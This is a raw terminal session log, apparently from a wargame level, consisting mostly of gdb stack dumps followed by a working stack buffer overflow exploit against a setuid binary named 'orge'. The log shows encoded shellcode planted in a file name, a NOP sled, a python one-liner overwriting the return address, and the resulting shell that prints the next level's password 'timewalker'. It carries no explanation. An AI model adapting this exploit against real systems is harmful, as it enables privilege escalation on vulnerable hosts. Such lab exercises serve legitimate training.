0xbffffae2:	0x00	0x00	0x0e	0x00	0x00	0x00	0xfa	0x01
0xbffffaea:	0x00	0x00	0x10	0x00	0x00	0x00	0xff	0xfb
0xbffffaf2:	0xab	0x0f	0x0f	0x00	0x00	0x00	0x2f	0xfb
0xbffffafa:	0xff	0xbf	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb02:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb0a:	0x00	0x00
(gdb) 
0xbffffb0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb14:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb1c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb24:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb2c:	0x00	0x00	0x00	0x69	0x36	0x38	0x36	0x00
0xbffffb34:	0x2e	0x2f	0x61	0x61	0x61	0x61	0xeb	0x11
0xbffffb3c:	0x5e	0x31
(gdb) 
0xbffffb3e:	0xc9	0xb1	0x32	0x80	0x6c	0x0e	0xff	0x01
0xbffffb46:	0x80	0xe9	0x01	0x75	0xf6	0xeb	0x05	0xe8
0xbffffb4e:	0xea	0xff	0xff	0xff	0x32	0xc1	0x51	0x69
0xbffffb56:	0x30	0x30	0x74	0x69	0x69	0x30	0x63	0x6a
0xbffffb5e:	0x6f	0x8a	0xe4	0x51	0x54	0x8a	0xe2	0x9a
0xbffffb66:	0xb1	0x0c	0xce	0x81	0x61	0x61	0x61	0x61
0xbffffb6e:	0x61	0x61
(gdb) 
0xbffffb70:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffffb78:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffffb80:	0x61	0x00	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb88:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb90:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb98:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffba0:	0x90	0x90
(gdb) 
0xbffffba2:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffbaa:	0x90	0x90	0x90	0x90	0xcc	0xbb	0xaa	0xbf
0xbffffbb2:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbba:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbc2:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbca:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbd2:	0x00	0x00
(gdb) x/50wx $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfaabbcc	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24
(gdb) 
0xbffffa44:	0xbffffc31	0xbffffdf4	0xbffffe13	0xbffffe30
0xbffffa54:	0xbffffe45	0xbffffe64	0xbffffe6f	0xbffffe89
0xbffffa64:	0xbffffe99	0xbffffea1	0xbffffeab	0xbffffebb
0xbffffa74:	0xbffffec9	0xbffffed7	0xbffffee8	0xbffffef3
0xbffffa84:	0xbfffff06	0xbfffff49	0xbfffff99	0x00000000
0xbffffa94:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffaa4:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffab4:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffac4:	0x00000009	0x08048450	0x0000000b	0x000001fa
0xbffffad4:	0x0000000c	0x000001fa	0x0000000d	0x000001fa
0xbffffae4:	0x0000000e	0x000001fa	0x00000010	0x0fabfbff
0xbffffaf4:	0x0000000f	0xbffffb2f	0x00000000	0x00000000
0xbffffb04:	0x00000000	0x00000000
(gdb) 
0xbffffb0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb2c:	0x69000000	0x00363836	0x61612f2e	0x11eb6161
0xbffffb3c:	0xb1c9315e	0x0e6c8032	0xe98001ff	0xebf67501
0xbffffb4c:	0xffeae805	0xc132ffff	0x30306951	0x30696974
0xbffffb5c:	0x8a6f6a63	0x8a5451e4	0x0cb19ae2	0x616181ce
0xbffffb6c:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb7c:	0x61616161	0x90900061	0x90909090	0x90909090
0xbffffb8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbac:	0xbbcc9090	0x0000bfaa	0x00000000	0x00000000
0xbffffbbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbcc:	0x00000000	0x00000000
(gdb) 
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc94:	0x00000000	0x00000000
(gdb) 
0xbffffc9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffccc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd5c:	0x00000000	0x00000000
(gdb) 
0xbffffd64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffda4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffde4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe24:	0x00000000	0x00000000
(gdb) x/50bx $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) 
0xbffff9ae:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9b6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9be:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9c6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9ce:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9d6:	0x00	0x00	0x90	0x90	0x90	0x90	0xcc	0xbb
0xbffff9de:	0xaa	0xbf
(gdb) 
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) 
0xbffffa12:	0x04	0x08	0x60	0xae	0x00	0x40	0x1c	0xfa
0xbffffa1a:	0xff	0xbf	0x90	0x3e	0x01	0x40	0x02	0x00
0xbffffa22:	0x00	0x00	0x34	0xfb	0xff	0xbf	0x82	0xfb
0xbffffa2a:	0xff	0xbf	0x00	0x00	0x00	0x00	0xb3	0xfb
0xbffffa32:	0xff	0xbf	0xca	0xfb	0xff	0xbf	0xe3	0xfb
0xbffffa3a:	0xff	0xbf	0x02	0xfc	0xff	0xbf	0x24	0xfc
0xbffffa42:	0xff	0xbf
(gdb) 
0xbffffa44:	0x31	0xfc	0xff	0xbf	0xf4	0xfd	0xff	0xbf
0xbffffa4c:	0x13	0xfe	0xff	0xbf	0x30	0xfe	0xff	0xbf
0xbffffa54:	0x45	0xfe	0xff	0xbf	0x64	0xfe	0xff	0xbf
0xbffffa5c:	0x6f	0xfe	0xff	0xbf	0x89	0xfe	0xff	0xbf
0xbffffa64:	0x99	0xfe	0xff	0xbf	0xa1	0xfe	0xff	0xbf
0xbffffa6c:	0xab	0xfe	0xff	0xbf	0xbb	0xfe	0xff	0xbf
0xbffffa74:	0xc9	0xfe
(gdb) 
0xbffffa76:	0xff	0xbf	0xd7	0xfe	0xff	0xbf	0xe8	0xfe
0xbffffa7e:	0xff	0xbf	0xf3	0xfe	0xff	0xbf	0x06	0xff
0xbffffa86:	0xff	0xbf	0x49	0xff	0xff	0xbf	0x99	0xff
0xbffffa8e:	0xff	0xbf	0x00	0x00	0x00	0x00	0x03	0x00
0xbffffa96:	0x00	0x00	0x34	0x80	0x04	0x08	0x04	0x00
0xbffffa9e:	0x00	0x00	0x20	0x00	0x00	0x00	0x05	0x00
0xbffffaa6:	0x00	0x00
(gdb) 
0xbffffaa8:	0x06	0x00	0x00	0x00	0x06	0x00	0x00	0x00
0xbffffab0:	0x00	0x10	0x00	0x00	0x07	0x00	0x00	0x00
0xbffffab8:	0x00	0x00	0x00	0x40	0x08	0x00	0x00	0x00
0xbffffac0:	0x00	0x00	0x00	0x00	0x09	0x00	0x00	0x00
0xbffffac8:	0x50	0x84	0x04	0x08	0x0b	0x00	0x00	0x00
0xbffffad0:	0xfa	0x01	0x00	0x00	0x0c	0x00	0x00	0x00
0xbffffad8:	0xfa	0x01
(gdb) 
0xbffffada:	0x00	0x00	0x0d	0x00	0x00	0x00	0xfa	0x01
0xbffffae2:	0x00	0x00	0x0e	0x00	0x00	0x00	0xfa	0x01
0xbffffaea:	0x00	0x00	0x10	0x00	0x00	0x00	0xff	0xfb
0xbffffaf2:	0xab	0x0f	0x0f	0x00	0x00	0x00	0x2f	0xfb
0xbffffafa:	0xff	0xbf	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb02:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb0a:	0x00	0x00
(gdb) 
0xbffffb0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb14:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb1c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb24:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffb2c:	0x00	0x00	0x00	0x69	0x36	0x38	0x36	0x00
0xbffffb34:	0x2e	0x2f	0x61	0x61	0x61	0x61	0xeb	0x11
0xbffffb3c:	0x5e	0x31
(gdb) 
0xbffffb3e:	0xc9	0xb1	0x32	0x80	0x6c	0x0e	0xff	0x01
0xbffffb46:	0x80	0xe9	0x01	0x75	0xf6	0xeb	0x05	0xe8
0xbffffb4e:	0xea	0xff	0xff	0xff	0x32	0xc1	0x51	0x69
0xbffffb56:	0x30	0x30	0x74	0x69	0x69	0x30	0x63	0x6a
0xbffffb5e:	0x6f	0x8a	0xe4	0x51	0x54	0x8a	0xe2	0x9a
0xbffffb66:	0xb1	0x0c	0xce	0x81	0x61	0x61	0x61	0x61
0xbffffb6e:	0x61	0x61
(gdb) 
0xbffffb70:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffffb78:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0xbffffb80:	0x61	0x00	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb88:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb90:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffb98:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffffba0:	0x90	0x90
(gdb) q
[darkelf@localhost temp]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\x36\xfb\xff\xbf"'`
6
bash$ my-pass
euid = 506
kernel crashed
bash$ exit
exit
[darkelf@localhost temp]$ ls
aaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaaaaaaaaaaaaaaaaaaaaa  core  orge
[darkelf@localhost temp]$ l
bash2: l: command not found
[darkelf@localhost temp]$ cd ..
[darkelf@localhost darkelf]$ ls
aaaa龞1ɱ2?l?ÿ??羵ꀨ쀿ÿ2i00tii0cjo?㐔?࿱?̿aaaaaaaaaaaaaaaaaaaaaaa  asdf  orge  orge.c  payload.txt  temp
[darkelf@localhost darkelf]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\x36\xfb\xff\xbf"'`
6
bash$ mypas
sh: mypas: command not found
bash$ mypass
sh: mypass: command not found
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ my-pass
euid = 507
timewalker
bash$ exit
exit
[darkelf@localhost darkelf]$ 